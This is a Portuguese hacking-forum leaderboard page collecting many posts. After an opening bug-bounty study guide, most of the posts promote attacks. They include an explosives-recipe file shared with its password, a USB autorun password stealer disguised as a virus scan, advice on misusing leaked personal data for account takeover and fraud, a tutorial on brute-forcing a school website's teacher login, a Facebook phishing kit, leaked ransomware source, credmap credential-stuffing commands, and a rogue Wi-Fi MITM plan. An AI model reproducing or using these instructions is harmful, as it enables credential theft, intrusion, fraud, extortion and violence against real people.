    Estamos aqui novamente rapaziada.... Hoje vamos falar sobre o que estudar para ser um bom caçador de bugs ou caçador de recompensas (COMO PREFERIR). Vamos primeiro desmistificar alguns mitos: 1- "BUG HUNTER É MAIS CAPACITADO DO QUE UM PENTESTER " /// Bug Hunter = Etical Hacker = Pentester. (WTFF?!?!?!?!?)) "Bug Hunter" é o termo dado para alguém que procura bugs em algum software em busca de recompensa (um pentester também, porém possui um tempo limitado e pode ser pago caso não encontre algo ) e ele utiliza as mesmas técnicas que um Pentester utiliza/utilizaria para realizar seu Teste de Intrusão. Existem SIM! Bug Hunters que são muito mais capacitados do que um Pentester, assim como também existe o contrário. 2- "VOU FAZER BUG PORQUE POIS DÁ MAIS DINHEIRO" /// Não é bem assim que funciona... Um Pentester pode ganhar bem mais do que um Bug Hunter, assim como o contrário. No caso de Bug Hunters, você recebe de acordo com a criticidade da vulnerabilidade (e onde) que você encontrou. O Pentester (se fizer parte de uma empresa) começará ganhando X e dependendo do seu desempenho poderá ganhar mais ou menos (). 3- "TAL BUG HUNTER TRABALHOU UMA NOITE E GANHOU $30.000" /// NÃO, NÃO E NÃO. Esse valor que foi pago, não foi por aquela semana/noite que ele passou procurando. Esse valor é fruto de todo conhecimento que foi adquirido ao longo do tempo que ele dedicou. 4- "POSSO SER BUG HUNTER E PENTESTER AO MESMO TEMPO" /// Sim, como já foi tido, Bug hunter nada mais é do que um pentester que realiza testes em busca de vulnerabilidades em softwares. Você pode sim ter um emprego na área de Segurança sendo um Pentester e fazer Bug Bounty no tempoo livre, tanto por diversão, quanto para aumentar sua renda. (). Você pode também ser aquele cara que sempre faz Bug Bounty, e além de caçar bugs nos programas das empresas, oferecer um serviço de Pentest para alguém. Bom, acho que os principais mitos foram falados, então vamos ao conteúdo. Já vimos que um Bug Hunter nada mais é do que um Pentester que busca bugs em empresas que possuem um programa de Bug Bounty. Então seguindo a lógica, podemos utilizar OS MESMOS CONTEÚDOS DE PENTEST para estudar, aprender, praticar e ir caçar seus bugs. Primeiro de tudo, o que seria de um Pentester sem as bases da segurança da informação? Não o CIDA, mas as bases que fazem com que a Segurança da Informação seja importante. Estou falando de Programação, Redes, Sistemas Operacionais, etc etc. E tendo esse princípio, iremos focar aqui no Pentest/Bug Bounty em Aplicações Web (no qual é o meu foco). Começando pela Programação, é difícil falar a você qual a melhor linguagem para ser estudada (JAVA NÃO É). O que eu recomendo é que você comece lá de baixo e ir evoluindo, dessa forma: HTML -> É interessante estudarmos HTML para entender como um site é estruturado, seus elementos, e também os tipos que ataque que o envolve. CSS -> Não muito diferente do HTML, é legal aprendermos pois o CSS hoje, nos possibilita utilizá-lo como vetor de ataque. Como exemplo deixo esse report de uma falha que utiliza o CSS como vetor de ataque => CSS Injection on /embed/ via bgcolor parameter leaks user's CSRF token and allows for XSS JAVASCRIPT -> Aqui, é extremamente importante que você conheça a fundo JavaScript, tanto pelos ataques que o envolvem, quanto pelos seus frameworks e plataformas que são criados e utilizados (criando muita força) tanto no Front-End quanto no Back-End. PHP -> Acho interessante estudar sobre pois ainda é altamente utilizado nos sites, por ser uma linguagem Server-Side, por ser fácil e por conter muito conteúdo na NET. SQL -> É essencial que seja aprendido o SQL devido ao fato de que quase todas as aplicações hoje utilizam algum banco de dados (relacional) para guardar suas informações. Python -> Recomendo o Python por ser uma linguagem muito fácil, poderosa e pode te ajudar bastante quando você precisar desenvolver alguma coisa rápida (claro que vai variar de programador para programador). XML -> Como assim XML??? Segue o mesmo princípio do HTML, você deve estudar para entender como determinados ataques funcionam, como por exemplo: XXE in Site Audit function exposing file and directory contents JAVA -> Por ser multiplataforma, e permitir que você decompile alguma biblioteca de forma mais fácil e legível para buscar vulnerabilidade como a que foi descoberta pelo João Matos (sou um grande fã) esse ano. CVE-2018-14667 Muitas outras tecnologias que existem, fica ao seu critério. Recomendo fortemente estudar as tecnologias que estão sendo utilizadas no site que você está procurando por vulnerabilidades. Um plugin que utilizo bastante para isso é o Wappalyzer. Partindo para Redes, é indispensável o conhecimento na área, pois você precisa entender como a internet funciona, como as aplicações se comunicam, como os protocolos conversam, quais regras são utilizadas etc. Protocolos de Transmissão como TCP/UDP -> É necessário ter conhecimento da base da internet, como os dados são trafegados e entreges etc. Protocolos de Aplicações (SSH, Telnet, HTTP) -> Toda aplicação utiliza algum protocolo para se comunicar, são inúmeros e cada um com suas devidas regras. Em especial, recomendo estudar fortemente o procotolo HTTP, pois ele possui diversos métodos, diferentes versões, e inúmeros Headers que você precisa entender como funcionam para tirar proveito e utilizar como vetores de ataque. Todos os outros assuntos que envolvem redes são bem vindos, pois dependendo da aplicação que você irá testar, você precisará entender como o protocolo dessa aplicação funciona. Indo pro último, mas não menos importante são os Sistemas Operacionais. Linux -> É essencial que você tenha conhecimentos relacionados ao sistema operacional do pinguim, pois é fortemente utilizado em servidores, e dependendo de cada distribuição, algumas coisas podem mudar. É muito importante que você entenda como funciona cada sistema operacional, pois haverá situações nas quais você poderá ter acesso à algum e precise de seus conhecimentos para realizar determinada ação. Windows (IMAGINEM QUE O EMOTICON É UMA JANELA. "ABSTRAÇÃO") -> Máquinas com esse sistema operacional também são utilizadas em diversos servidores espalhados ao redor do mundo, não diferente do Linux, você deve entender como funciona o sistema para conseguir realizar determinadas funções que sejam necessárias para dar continuidade ao seu Bounty. FreeBSD -> FreeBSD ainda é utilizado para servidores, e como os outros sistemas descritos, você precisará entender como ele funciona. PRATIQUE CTF, LEIA REPORTS, LEIA WRITEUPS, TUDO ISSO PODERÁ AJUDAR VOCÊ A DESENVOLVER SEU MINDSET. Após pesquisar em vários lugares (fórum do BugCrowd) resolvi colocar aqui materiais para que vocês possam estudar e começarem a fazer seus programas de Bug Bounty. LIVRO (Inglês) -> The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws (Dafydd Stuttard,‎ Marcus Pinto) OBS: eu traduzi ele por completo, se quiserem eu passo o link para vocês. LIVRO (Português) -> Testes de Invasão - Uma Introdução Prática ao Hacking (Georgia Weydman) LIVRO (Português) -> Pentest em Aplicações Web (Daniel Moreno) LIVRO (Inglês) -> Owasp Testing Guide (Owasp) LIVRO (Inglês) -> Web Hacking 101 - How to Make Money Hacking Ethically (Peter Yaworski) CURSO (Inglês) -> Hacker101 (HackerOne) CURSO (Inglês) -> Bugcrowd University (BugCrowd) WRITEUP DAS FALHAS EXPLICADAS (Inglês) -> Pentester Land REPORTS DIVULGADOS (Inglês) -> HackerOne CANAL NO TELEGRAM SOBRE REPORTS (Inglês) -> Bug Bounty Channel BOT DE DIVULGAÇÃO DE RELATÓRIOS (Inglês) -> Public Disclosure Bot PAPERS SOBRE CTF/BUGBOUNTY (Português) -> Hackaflag Papers - Hackaflag Academy Bom galera, acho que por hoje é só. Espero que tenha despertado o interesse em vocês. Qualquer dúvida, sugestão, correção, discussão, se você não concorda em alguma coisa deixa aí nos comentários, tudo é bem-vindo !!!!
  36. 6 points
    Fala ae galera bombástica O arquivo com a receita para criação de explosivos, retirado da 87463ª camada da DarkWeb, está em anexo neste tópico. EU NÃO TENHO RESPONSABILIDADE ALGUMA SOBRE O QUE VOCÊ FARÁ COM ESTE CONHECIMENTO, ESTOU APENAS DIVULGANDO O MESMO, O QUE NÃO É CRIME. Divirtam-se kk Senha do arquivo: [email protected] Explosives.PDF - ipe.pdf
  37. 6 points
    Título: Arquitetura de Sistemas Operacionais Autor(es): Francis Berenger Machado, Luiz Paulo Maia. Edição: 4. Editora: LTC Este livro aborda o funcionamento e a arquitetura de sistemas operacionais modernos, como Unix e Windows, situações como gerência de UCP, gestão de memória estática e dinâmica, escalonamento de processos, arquiteturas de dados e processamento, gerência de processos e tudo mais que for relacionado à este tipo de tecnologia. Este livro é muito útil para quem cursa, Análise e Desenvolvimento de Sistemas ou Sistemas de Informação pois aborda matéria de vários semestres. Abaixo segue a capa do Livro. Arquitetura de Sistemas Operacionais - Luis Paulo Maia.pdf
  38. 6 points
    Olá amigos. Trago hoje uma ferramenta para "roubar" as senhas dos navegadores que estão salvos. A ferramenta para download está disponível no site oficial (Nirsoft - WBPS) - Download no fim da página. 1° - Formate seu pendrive para o formato NTFS. 2° - Crie uma pasta com o nome que quiser, ou como padrão "usb" :v. (Observação, se colocar outro nome, vai ter que mudar o caminho no arquivo .bat) 3° - Passe o arquivo executável que foi baixado no arquivo .zip e passe para essa pasta. 4° - Crie um arquivo de texto e cole isso aqui: @echo off cls start \usb\WebBrowserPassView.exe /shtml 1.html 4.1° - Salve o arquivo como: USBdriver.bat 5° - Crie um arquivo de texto e cole isso aqui: [autorun] open=usbdriver.bat Action=Perform a virus Scan 5.1° - Salve o arquivo como: Autorun.inf Vai ficar assim: Na hora que colocar, deixe-o escanear pelo antivírus e ele vai ser executado. Se não for, clique abra o programa: Deixei só uma senha gerada aleatória ali do lado (né :v) Bem, o site tem outras ferramentas relacionadas com senhas, estou testando elas por aqui e depois vou passando. (Outro ponto, acredito que a parte dos códigos nos arquivos, são para salvar automaticamente depois do escaneamento do antivírus, mas acho que só clicando no programa já vai, testa ai. ) Outra coisa bem importante, acho que deu para perceber que ele tem que estar logado, se necessário, use outras artimanhas para passar pela senha do Windows. --- Assim, não só pense no maligno kkk dá para usar isso quando algum conhecido esquecer uma senha salva. Isso ae e.e
  39. 6 points
    E ae galera, quanto tempo ^-^. Hoje vou mostrar a vocês o perigo de ter seus dados vazados. A pior coisa é ter seus dados vazados na internet, não acham? Hoje, é muito fácil consultar CPF/NOME/CNPJ de alguém, vamos ver alguns meios: 1 - Cadsus - fonte de todos. Sendo o principal, cadsus é o sistema de cadastramento de Usuários do Sistema Único de Saúde (SUS). Todas as pessoas registradas no SUS, estão nesse site/sistema. Em 2014/2015, o cadsus tem milhares de contas vazadas, e com isso, criminosos podiam tirar proveitos. 2 - Tudo Sobre Todos Tudo Sobre Todos, um dos sites mais falados em meados de 2015/2016. Ainda de pé hoje (assim como o cadsus), Tudo Sobre Todos fornece informações das pessoas através de pagamentos. Esse site alem de mostrar os seus dados, também mostra a localização de sua residencia via satélite e entre outras coisas. Não vou me aprofundar nesses sites, existem diversos, alguns pagos e outros não. Após ter uma "ferramenta" dessa em suas mãos, o invasor pode consultar o seu nome e com isso utilizar para diversas coisas, como por exemplo: compras com o seu nome, processos, multas, entre outras coisas. Vamos a pratica. Tendo uma dessas ferramentas em mão, consulte um nome qualquer. Podemos ver que tem varias coisas, mas, o que podemos fazer com isso? 1 - Invadindo redes sociais Invasão em redes sócias hoje em dia é comum, já vi casos de pessoas compartilhando dados de cartão de credito pelo chat O_o. As pessoas são burras, todos nos sabemos, agora pense em uma pessoa burra + pessoa burra ². Elas existem, e são aquelas que colocam a senha como a data de nascimento. Talvez a pessoa seja "mais" esperta, talvez ela tenha colocado a data de nascimento + o nome de alguém. Agora, imagine um programa rodando com vários nomes de pessoas (após uma coleta de dados) + a data de nascimento... [/align] 2 - Comprando com o seu nome Sendo uma das coisas mais injustas, na minha opinião, além de comprometer suas redes sociais ou qualquer outro site que você esteja cadastrado, o atacante pode usar seus dados para fazer comprar e assim sujar o seu nome. [/align] 3 - Processos Imagine um dia qualquer você receber uma carta do Tribunal de Justiça, dizendo que você fez X coisa. Pode acreditar, isso acontece diariamente, o uso de documentos falsos para tirar carteira de motorista é constante, além disso você pode receber processos de multas, dividas.. Não irei ensinar isso agora, é assunto para outro tutorial 4 - Operadoras de Internet Esse método é meio troll, imagine um dia você mexendo em seu computador e de repetente você fica sem internet. Acredite ou não, qualquer uma pessoa com o seus dados pode cancelar seus planos com operadoras e fazer com que você esteja com o nome sujo na mesma. Então galera, por enquanto isso é apenas a introdução, vou tentar fazer 3 partes desse assunto. Abraços.
  40. 6 points
    Fala ae garera!!! Vou deixar fixado esse tópico sendo o oficial para compartilhamento de Wallpapers, da Fsociety ou não. Aqui estão alguns oficiais para se deliciarem . Créditos aos designers da FSBr e aos membros que contribuíram. Link: Wallpapers FSBr
  41. 6 points
    Teste suas habilidades. Sites permitem que você os invada. Supercar Showdown Hack-me Hackthisite TRY2HACK Hackthis
  42. 6 points
    Apostilas de Segurança, Segurança da informação, Anonimato na internet, Firewall, Criptografia, e etc. Aula de seguranca.pdf firewall proteçãp.pdf firewall tuto basico.pdf Fundamentos de sistemas de segurança da informaçao.pdf Gestão de Segurança da Informação.pdf Tutorial como ficar invisível.pdf Técnicas Hacker soluções para segurança 1.pdf Técnicas Hacker soluções para segurança 2.pdf Sua Rede Wireless é Realmente Segura.pdf Sistema para identificar invasão.pdf Segurança Ofensiva.pdf Introdução à Segurança da Informação.pdf Manual da Segurança da Informação.pdf extensoes_seguranca_DNS.pdf
  43. 6 points
    Phishing Facebook DOWNLOAD VIRUS TOTAL
  44. 6 points
    O código-fonte de uma das mais antigas famílias de ransomware para dispositivos móveis e populares foi vazado on-line, tornando-o disponível para cibercriminosos que podem usá-lo para desenvolver variantes mais personalizadas e avançadas do ransomware Android. O código-fonte do resgate do SLocker , que viu um aumento de seis vezes no número de novas versões nos últimos seis meses,foi vazado no GitHub e agora está disponível para quem quiser. O código-fonte do SLocker foi vazado por um usuário que usa 'fs0c1ety' como um moniker online e pede a todos os usuários do GitHub que contribuam para o código e enviem relatórios de erros. SLocker ou Simple Locker é tela de bloqueio móvel e ransomware de criptografia de arquivos que criptografa arquivos no telefone e usa a comunicação Tor for command and control (C & C). O malware também se colocou como órgãos de aplicação da lei para convencer as vítimas a pagar o resgate.Famosa por infectar milhares de dispositivos Android em 2016, pesquisadores de segurança descobriram mais de 400 novas variantes do resgate de SLocker em estado selvagem em maio, e logo depois de um mês, o desagradável sistema de ransomware Android foi visto copiando a GUI do WannaCry.Uma vez infectado, o SLocker corre silenciosamente no fundo do dispositivo de uma vítima sem o seu conhecimento ou consentimento e criptografa imagens, documentos e vídeos em dispositivos móveis.Uma vez que tenha arquivos criptografados no dispositivo, o ransomware do Android seqüestra o telefone,Por que você deveria se preocupar?Estando em ação a partir de 2015, a SLocker se destaca como uma das primeiras amostras de ransomware para criptografar arquivos do Android. O malware modificou-se além de apenas bloqueando telas e exigindo pagamento para assumir os direitos administrativos e controlar o microfone, altifalantes e a câmera do dispositivo. E agora, desde que o código-fonte deste ransomware Android desagradável foi lançado on-line no GitHub, os dispositivos Android provavelmente receberão um número crescente de ataques de resgate nos próximos dias.O código fonte vazado seria uma oportunidade de ouro para aqueles que sempre buscam oportunidades como esses programas de malware apenas são oferecidos para venda em fóruns subterrâneos, mas o SLocker agora está acessível para cibercriminosos e fraudadores GRATUITAMENTE.No início deste ano, os pesquisadores descobriram uma variante do BankBot banking trojan in the wild, que foi desenvolvido usando o código-fonte vazado para o malware em um fórum subterrâneo de hacking. ----> Como se proteger? Como mencionei anteriormente, os usuários sempre recomendam seguir algumas precauções básicas para se proteger contra tais ameaças: * Nunca abra anexos de email de fontes desconhecidas. * Nunca clique nos links em mensagens SMS ou MMS. * Mesmo que o e-mail pareça legítimo de alguma empresa, vá diretamente para o site de origem e verifique todas as atualizações possíveis. * Vá para Configurações → Segurança e Desligue "Permitir a instalação de aplicativos de fontes diferentes da Play Store".Mantenha sempre seus dispositivos Android, aplicativos e aplicativos antivírus atualizados. * Evite hotspots Wi-Fi desconhecidos e não protegidos e mantenha o Wi-Fi desligado quando não estiver em uso. Link: https://github.com/fs0c1ety/SLocker Hacker Security.
  45. 6 points
    Fala galera , deixo pra vocês hoje 1 tera de Material ! https://goo.gl/krLfuM
  46. 6 points
    Site com lista com várias WordLists Para você usar nas suas peripécias de brute-force <3 https://github.com/danielmiessler/SecLists/tree/master/Passwords
  47. 6 points
    Github https://github.com/lightos/credmap Examples: ./credmap.py --username janedoe --email [email protected] ./credmap.py -u johndoe -e [email protected] --exclude "github.com, live.com" ./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com" ./credmap.py -e [email protected] --verbose --proxy "https://127.0.0.1:8080" ./credmap.py --load creds.txt --format "e.u.p" ./credmap.py -l creds.txt -f "u|e:p" ./credmap.py -l creds.txt ./credmap.py --list
  48. 5 points
    Estava eu pesquisando milhares de apostilas para aprender e dominar de fato a linguagem inglesa, então encontrei essa apostila, ela me ajudou muito, espero que ajudem vcs APOSTILA DE INGLÊS BÁSICO – PRONATEC/UNEP/FUNECE TAMANHO: 3.3 mb apostila_ingles_basico.pdf
  49. 5 points
    HACKEANDO O SITE DA ESCOLA Antes de tudo. Esse post de certa forma, VAI ENSINAR ALGUMAS TÉCNICAS QUE PODEM SER USADAS EM UM ATAQUE NO SITE DE SUA ESCOLA E QUE PODEM LHE GARANTIR ACESSO AO SERVIDOR! Entretanto, o método que usaremos para atacar não é 100% de certeza que vai funcionar, e exige muito tempo e paciência. Enfim, tendo isso em mente, vamos começar. FASE 1 - Coleta de informações: Antes de começar a atacar, nós temos de ter em mente o planejamento, nós temos que planejar cada etapa do ataque, da coleta de informação até a exploração, e vai funcionar assim: Como iremos usar um método de ataque chamado brute-force, ou seja, um ataque de força bruta, precisamos saber como o sistema funciona e quem tem uma conta no sistema. Como no caso, o sistema é da sua escola, quem tem acesso são os professores, então, como nós já sabemos o nome de nossos professores, vamos salvar em um .TXT. O nome do meu (fictício) é José Henrique. Com o nome de seu professor salvo, vamos acessar o site e entender como o sistema funciona. Ao entrarmos no site, podemos ver duas coisas: Que damos de cara com um sistema de login, ou seja, que é um sistema restrito a professores. E que, o login é efetuado por E-MAIL e não usuários. Sendo assim, é bem provável (98% de certeza) que o professor em específico deva utilizar seu e-mail no login. Tendo isso mente, agora nós temos que saber de algumas informações do professor, tanto pra auxiliar na descoberta de sua senha e para descobrirmos o e-mail. Vamos descobrir essas coisas em suas redes sociais, é o melhor método de pegar informações atualmente. Ao acessar a aba "sobre" do Facebook do seu professor, podemos ver algumas informações, como suas informações de contato. E ao descobrirmos isso, podemos ver também a data em que ele nasceu, dentre outras informações. Essa questão da data é importante, pois, MUITA gente coloca data, dia, mes, ou ano de nascimento em seus emails ou senhas, como podemos ver em destacado na imagem. Tendo essas informações, creio que ja dê para a gente atacar. Fase 2 - Exploração. Bem, como nós já conseguimos algumas informações necessárias, vamos montar nossa lista. Eu montei uma lista curta de 4 linhas para resumir um pouco, mas tu pode montar uma lista BEEEM maior. Na lista temos as seguintes senhas: professorjose jose123 jose73 josehenrique1973 Agora, com nossa lista já montada, nós podemos começar. Vamos decidir o programa que iremos usar, EXISTEM VÁRIOS que podem se utilizados no caso. No fim do post eu deixarei a recomendação de alguns. Mas neste tutorial em específico, vou usar um programa de bruteforce HTTP simples que eu criei. Basicamente, todos os programas usam a mesma lógica: Botar um e-mail (ou uma lista de e-mails), e colocar uma lista de senhas. No meu caso, eu fiz um rápido pra entrada de um e-mail. No caso, eu coloquei o email e a lista de senhas do professor e o ataque começou. Enquanto ele vai testando as senhas, ele vai enviando o output pra você dizendo se a senha é correta ou não. De fato, com o teste realizado, ele descobriu a nossa senha. Após recebermos o e-mail e a senha corretos, vamos logar com eles no site, certo? CONSEGUIMOS!!! Dicas de programas que realizam Brute-force HTTP: - Hydra - Burp Suit - E meu próprio programa:
  50. 5 points
    E ae galera, to tentando trazer técnicas black hat para vocês. Não estou incentivando ninguém a virar black hat, são apenas técnicas. Sabemos que o Facebook é a maior rede social que existe - até então - e que além do Google, ela também trás diversas informação sobre tudo. Quase todo evento é publicado no Facebook para atrair varias pessoas, um evento deve ter: - Endereço - Data - Publico alvo - Horas do inicio e fim. E entre outras coisas. Sabendo disso, um cibercriminoso para montar um plano para atacar as pessoas presentes nesse evento. Vamos a pratica. PLANEJAMENTO O ano esta quase acabando, nisso eu decidi filtrar eventos sobre o ano novo. Sabemos que as pessoas gostam de Wifi para falar com seus familiares e amigos. Com a localização do evento, o atacante pode se posicionar em um local onde tenha um Wifi com um sinal alto que vá até o evento. Localizando o evento pelo Google Maps, podemos observar que existe uma praça próximo ao evento, que pode servir como local do ataque. O site mapspanoramics nos mostra pontos de Wifi grátis, analisando, podemos ver vários pontos de Wifi perto do evento alvo. Esses pontos podem servir como hotspot fake. Fora que o atacante pode invadir algum wifi perto e fazer com que a sua maquina seja o próprio roteador malicioso. O ATAQUE Com tudo planejado, o atacante só vai precisar de um dispositivo para fazer seus ataques. O ataque dns hijacker serve para que as vitimas se redirecionem para determinados sites falsos, entretanto, a engenharia social pode ir longe. O atacante pode "pedir" para que a vitima instale um determinado aplicativo malicioso em seu celular e com isso infectando o dispositivo. Além de redirecionamento para sites falsos, o ataque MITM pode prejudicar diversas pessoas. Então galera espero que vocês tenham gostado, foi um blog rápido, sorry <3. Até a próxima.
This leaderboard is set to Sao Paulo/GMT-03:00


×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.